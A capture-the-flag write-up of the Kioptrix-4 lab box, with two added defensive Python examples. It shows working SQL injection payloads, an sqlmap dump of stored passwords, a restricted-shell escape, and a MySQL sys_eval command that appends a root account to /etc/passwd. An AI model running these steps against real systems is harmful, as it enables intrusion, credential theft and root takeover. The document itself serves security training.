Welcome to the Kioptrix-4 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Kioptrix-4

tags: Vulnhub Easy Linux OSCP
Platform: Vulnhub
Difficulty: Easy
OS: Linux

Kioptrix: Level 1.3 (#4)

Enumeration

Nmap

To get started, we run a quick scan for open ports.

$ nmap -Pn -T4 -p- 172.20.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 14:24 CEST
Nmap scan report for 172.20.10.9
Host is up (0.0011s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 22.53 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80,139,445 172.20.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 14:25 CEST
Nmap scan report for 172.20.10.9
Host is up (0.00029s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 2h49m42s, median: 2h00m00s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2021-07-01T10:25:28-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 172.20.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.32 seconds

Port 80

On the website on port 80 we find a login form. Trying SQL injection with the classic payload ' OR '1'='1, we see that we can log in even though the page reports an error.
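
Why the login form accepts that payload, and what fixes it, shown as an added example (not code from the original write-up or from the target application). It uses an in-memory sqlite3 table as a constructed stand-in for the MySQL members table, and the function names and the query shape are assumptions:

```python
import sqlite3

def make_db():
    """Constructed stand-in for the members table (sqlite3 instead of MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO members (username, password) VALUES (?, ?)",
        [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")],
    )
    return db

def login_vulnerable(db, username, password):
    # Assumed flaw: form values are pasted into the SQL text, so a quote in
    # the input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT COUNT(*) FROM members "
           "WHERE username='%s' AND password='%s'" % (username, password))
    return db.execute(sql).fetchone()[0] > 0

def login_parameterized(db, username, password):
    # Placeholders send the values separately from the statement, so the
    # input is only ever compared as data. Exactly one row must match.
    sql = "SELECT COUNT(*) FROM members WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()[0] == 1

def compare(username, password):
    """Return (vulnerable_result, parameterized_result) for one login attempt."""
    db = make_db()
    return (login_vulnerable(db, username, password),
            login_parameterized(db, username, password))

if __name__ == "__main__":
    tautology = "' OR '1'='1"  # the classic payload mentioned above
    print("valid creds:", compare("john", "MyNameIsJohn"))
    print("wrong pass :", compare("john", "nope"))
    print("tautology  :", compare("john", tautology))
```

With the concatenated query the WHERE clause ends in OR '1'='1' and matches every row; with placeholders the same input is just a wrong password.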

Blind SQL Injection

As I am completing this box as training for the OSCP and Nmap is not allowed in the exam, I have written a script to be able to do the exploitation.

$ python3 blindSQLinjector.py -u http://172.20.10.9/checklogin.php -f 'myusername' -f 'mypassword' -p mypassword -H '{"Content-Type": "application/x-www-form-urlencoded","Cookie": "PHPSESSID=52757c941a411bfc3df3bf45c1c2e406"}' -e 'Wrong Username'
 __________________________________________________________________________
|  _     _ _           _  _____  ____  _      _____       _           _    |
| | |   | (_)         | |/ ____|/ __ \| |    |_   _|     (_)         | |   |
| | |__ | |_ _ __   __| | (___ | |  | | |      | |  _ __  _  ___  ___| |_  |
| |  _ \| | | '_ \ / _  |\___ \| |  | | |      | | | '_ \| |/ _ \/ __| __| |
| | |_) | | | | | | (_| |____) | |__| | |____ _| |_| | | | |  __/ (__| |_  |
| |_.__/|_|_|_| |_|\__,_|_____/ \___\_\______|_____|_| |_| |\___|\___|\__| |
|                                                       _/ |               |
|                           Made by X4v1l0k            |__/                |
|__________________________________________________________________________|

+---------------------------------------+
|   Database: members | Table: members  |
+----+----------+-----------------------+
| id | username |        password       |
+----+----------+-----------------------+
| 1  |   john   |      MyNameIsJohn     |
| 2  |  robert  | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

Anyway, so that everyone can see how to do it with SQLMap, here it is!

SQLMap

$ sqlmap -u http://172.20.10.9/checklogin.php --data="myusername=admin&mypassword=admin5&Submit=Login" -D members -T members --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:33:24 /2021-07-01/

[21:33:25] [INFO] resuming back-end DBMS 'mysql' 
[21:33:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=HMFmOXVY&mypassword=-3789' OR 1396=1396#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=HMFmOXVY&mypassword=v2W!k6n!K5' AND (SELECT 7971 FROM (SELECT(SLEEP(5)))ywLP)-- BXgs&Submit=Login
---
[21:33:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[21:33:25] [INFO] fetching columns for table 'members' in database 'members'
[21:33:25] [INFO] resumed: 3
[21:33:25] [INFO] resumed: id
[21:33:25] [INFO] resumed: username
[21:33:25] [INFO] resumed: password
[21:33:25] [INFO] fetching entries for table 'members' in database 'members'
[21:33:25] [INFO] fetching number of entries for table 'members' in database 'members'
[21:33:25] [INFO] resumed: 2
[21:33:25] [INFO] resumed: 1
[21:33:25] [INFO] resumed: MyNameIsJohn
[21:33:25] [INFO] resumed: john
[21:33:25] [INFO] resumed: 2
[21:33:25] [INFO] resumed: ADGAdsafdfwt4gadfga==
[21:33:25] [INFO] resumed: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

[21:33:25] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/172.20.10.9/dump/members/members.csv'
[21:33:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.20.10.9'

[*] ending @ 21:33:25 /2021-07-01/

Exploitation

Now that we have the users' passwords, we try them over SSH and manage to log in, but we land in a restricted shell.

$ ssh john@172.20.10.9
john@172.20.10.9's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls
john:~$

After reading online about how to escape and trying various methods, we manage to escape by using the echo command to execute Python's os.system('/bin/bash').

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$

Post exploitation

Privilege escalation: user to user

Enumeration

Linpeas

[+] MySQL connection using root/NOPASS ................. Yes
[+] Searching mysql credentials and exec
Found lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');

Exploitation

Linpeas tells us that we can access MySQL as root without a password and that the lib_mysqludf_sys.so library is loaded, so we can execute system commands as root from MySQL using the sys_eval() function.

john@Kioptrix4:~$ mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 77819
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> use mysql; 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> SELECT sys_eval('id');
ERROR 1305 (42000): FUNCTION mysql.sys_eval does not exist

As we can see, the function has not been created, but we can create it and then use it.

mysql> CREATE FUNCTION sys_eval RETURNS INT SONAME 'lib_mysqludf_sys.so';                                           
Query OK, 0 rows affected (0.00 sec)

mysql> SELECT sys_eval('id');                                            
+----------------+
| sys_eval('id') |
+----------------+
|           NULL | 
+----------------+
1 row in set (0.01 sec)

Cool! Now that we can use it, we are going to inject a user with root privileges into the /etc/passwd file.

mysql> select sys_eval('echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| sys_eval('echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
|                                                                        146120912 | 
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)

And now we should be able to authenticate as the injected user and be root!

john@Kioptrix4:~$ su x4v1l0k
Password: 
Failed to add entry for user x4v1l0k.

root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john#
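
How a defender would spot the entry appended above, as an added example (not part of the original write-up): a small audit of passwd-format text that flags extra UID 0 accounts and password hashes stored directly in the file. The function name and the sample file are constructed; only the last sample line comes from this page.

```python
# Constructed sample: the first three entries are illustrative, the last one
# is the line the write-up appends through sys_eval.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/sh
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
"""

# Values meaning "no hash here": it lives in /etc/shadow or the login is locked.
PLACEHOLDERS = {"x", "*", "!", "!!"}

def audit_passwd(text):
    """Return (account, finding) pairs for suspicious passwd entries."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        # Any account with UID 0 is root for the kernel, whatever its name.
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((name, "UID 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in PLACEHOLDERS:
            findings.append((name, "password hash stored in passwd, not shadow"))
    return findings

if __name__ == "__main__":
    # On a real host, pass open("/etc/passwd").read() instead of the sample.
    for account, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {finding}")
```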

And that's all!

I have enjoyed making this box as I have never exploited a blind SQL injection manually before. And thanks to this box, now I have my own script to exploit them!! :D